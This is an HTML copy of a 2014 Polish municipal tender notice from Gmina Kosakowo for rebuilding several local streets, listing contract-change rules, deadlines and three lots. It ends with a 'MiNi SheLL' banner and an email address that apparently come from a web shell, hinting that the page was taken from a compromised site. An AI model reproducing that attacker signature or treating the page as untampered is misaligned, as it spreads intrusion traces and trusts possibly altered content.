<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
Zamawiający wymaga od wybranego wykonawcy zawarcia umowy wg wzoru w załączniku nr 1 do SIWZ. Wypełnienie druku umowy oraz ewentualne zmiany powstałe podczas prowadzenia postępowania przetargowego zostaną uwzględnione w redakcji końcowej , po wyborze Wykonawcy ZMIANY UMOWY 1. Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach : a) Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru wykonawcy b) Zmian korzystnych dla zamawiającego, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy . c) Przesunięcia terminu wykonania przedmiotu umowy jeżeli z przyczyn od wykonawcy niezależnych, których nie można było przewidzieć w chwili zawarcia umowy, nie jest możliwe dotrzymanie terminu wykonania przedmiotu umowy d) Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy . e) Wprowadzenia lub zmiany podwykonawcy f) Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT) g) Zmiany w zakresie przedmiotu zamówienia jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa. h) Wynagrodzenie umowne może ulec zmianie w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy. 2. Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności ,o których mowa w pkt 1. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie. 3. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kosakowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kosakowo 81-198 Kosakowo ul. Żeromskiego 69 pok. 206..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2014 godzina 10:00, miejsce: Urząd Gminy Kosakowo 81-198 Kosakowo ul. Żeromskiego 69 Biuro Obsługi Interesanta pok. 3 na parterze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ul. Jastruna w m. Suchy Dwór - Gmina Kosakowo na podstawie Projektu Wykonawczego Przebudowa ul. Jastruna w m. Suchy Dwór Gmina Kosakowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Przedmiotem zamówienia jest przebudowa ul. Jastruna w Suchym Dworze - Gmina Kosakowo: Wykonanie drogi dwupasowej o długości około 220m, szerokości 5,5m i nawierzchni bitumicznej. Po obu stronach jezdni pobocze gruntowe o szerokości około 1,75m z kruszywa naturalnego. Przekrój poprzeczny daszkowy o nachyleniu spadków 2%. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul. Jastruna stanowiącym załącznik do SIWZ. Szczegółowe określenie zakresu wykonania przebudowy ul. Jastruna wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ul. Necla w m. Suchy Dwór - Gmina Kosakowo wraz z wykonaniem organizacji ruchu na podstawie Projektu Wykonawczego Przebudowa ul. Necla w m. Suchy Dwór..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa ul. Necla w suchym Dworze - Gmina Kosakowo: Wykonanie drogi na odcinku około 214m (na odcinku od skrzyżowania z ul. Burchardta do skrzyżowania z ul. Kochanowskiego) wraz ze stała organizacją ruchu, szerokość jezdni 6m, nawierzchnia bitumiczna, zamknięta obustronnie krawężnikiem wraz z przebudową czterech skrzyżowań. Łuki na skrzyżowaniach 6m. Szczegółowe określenie zakresu wykonania przebudowy ul. Necla wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa ul. Poświatowskiej, Herberta, Borowskiego i Baryki w m. Pogórze - Gmina Kosakowo na podstawie Projektu Wykonawczego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa ul. Poświatowskiej, Herberta, Borowskiego i Baryki w m. Pogórze - Gmina Kosakowo: Wykonanie drogi o nawierzchni bitumicznej oraz z kruszywa łamanego o łącznej długości około 565m. Ulice Herberta, Borowskiego i Poświatowskiej na odcinku pierwszych 45m, zaprojektowano jako drogi dwupasowe o szerokości 5,5m i nawierzchni bitumicznej z poboczami gruntowymi z obu stron jezdni o szerokości 0,75m. na pozostałym odcinku ul. Poświatowskiej zaprojektowano nawierzchnię z kruszywa łamanego o szerokości 5,5m. pozostały teren należy uzuzpełnic humusem z obsianiem trawą. Wykonanie stałej organizacji ruchu zgodnie z projektem Stałej Organizacji Ruchu ul.Poświatowskiej, Herberta, Borowskiego i Baryki stanowiącym załącznik do SIWZ. Szczegółowe określenie zakresu wykonania przebudowy ul. Poświatowskiej, Herberta, Borowskiego i Baryki wskazano w projekcie Wykonawczym, o którym mowa wyżej oraz w opisie przedmiotu zamówienia i pozostałych dokumentach stanowiących integralną część SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com